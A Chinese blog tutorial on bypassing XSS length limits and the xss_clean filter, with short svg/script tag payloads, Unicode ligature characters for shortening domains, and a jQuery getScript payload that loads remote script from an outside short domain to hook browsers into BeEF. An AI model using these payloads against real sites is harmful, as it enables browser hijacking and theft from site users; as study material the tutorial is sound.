当前位置:网站首页>限制字符绕过
限制字符绕过
2022-07-31 00:00:00 【Miracle_ze】
字符短域名绕过
一、绕过方法
1.1 重写,使用短标签
<svg/onload = ‘’ >
<script/ src = ’ ’ >
1.2 Unicode中多字符表示单字符
以下特殊字符会被html识别为单个字符
- ff expands to
ff- ℠ expands to
sm- ㏛ expands to
sr- st expands to
st- ㎭ expands to
rad- ℡ expands to
tel
1.3 实体编码html
二、限制长度短字符短域名绕过
2.1 xss_clean 过滤语句
使用beef工具开始尝试xss注入,首先使用基础语句实现弹窗<script>alert(1)</script>
添加结果:
由上图可见 被xss_clean过滤了注入失败。
为此我们删除xss_clean 来测试是否因为它而被过滤
结果表示xss_clean造成被过滤原因就是xss_clean
值得注意的是在当前xss_clean版本忽略了svg,为此我们可以使用svg注入
再次刷新页面同样显示
2.2
在观察前端引用文件时发现使用了jQuery
因此可以使用<svg/onload=$.getScript(‘℡㏛.co’)>注入,使用老师的telsr.co的域,是缩短了的即为5个字符。但是这个网站是老师提供的外网,我没有vpn因此选择了自己的。因此修改里字符限制长度
成功获取获取,在beef查看。
beef获取成功成功绕过。
三、kali的beef安装
边栏推荐
- transition transition && animation animation
- 360核心安全大脑3.0正式发布,构建政企用户的“能力中枢平台”
- 常用的正则表达式
- Chevrolet Trailblazer, the first choice for safety and warmth for your family travel
- 数据清洗-使用es的ingest
- 乌克兰外交部:乌已完成恢复粮食安全出口的必要准备
- joiplay模拟器rtp如何安装
- what is jira
- # # yyds dry goods inventory interview will brush TOP101: to determine whether there is a part of the list
- uni-ui安装
猜你喜欢
随机推荐
WebServer process explanation (registration module)
二叉查找树的定义,查找,插入,删除
Soft Exam Summary
Machine Learning 1-Regression Model (2)
@requestmapping注解的作用及用法
matplotlib图表多曲线多纵轴绘制工具方法
软件测试三阶段,你在哪一步?
mysql中关于存储过程无法实现迁移复制表中数据问题
Steven Giesel 最近发布了一个由5部分内容组成的系列,记录了他首次使用 Uno Platform 构建应用程序的经验。
uni-ui installation
动态修改el-tab-pane 的label(整理)
pytorch的安装注意事项
#Dasctf July Enabler WP
[0x800706D9] solution appears in Microsoft Store
HCIP第十六天笔记
In MySQL, the stored procedure cannot realize the problem of migrating and copying the data in the table
ABC 261 F - Sorting Color Balls(逆序对)
How to solve the error of joiplay simulator
45.【list链表的应用】
How to solve types joiplay simulator does not support this game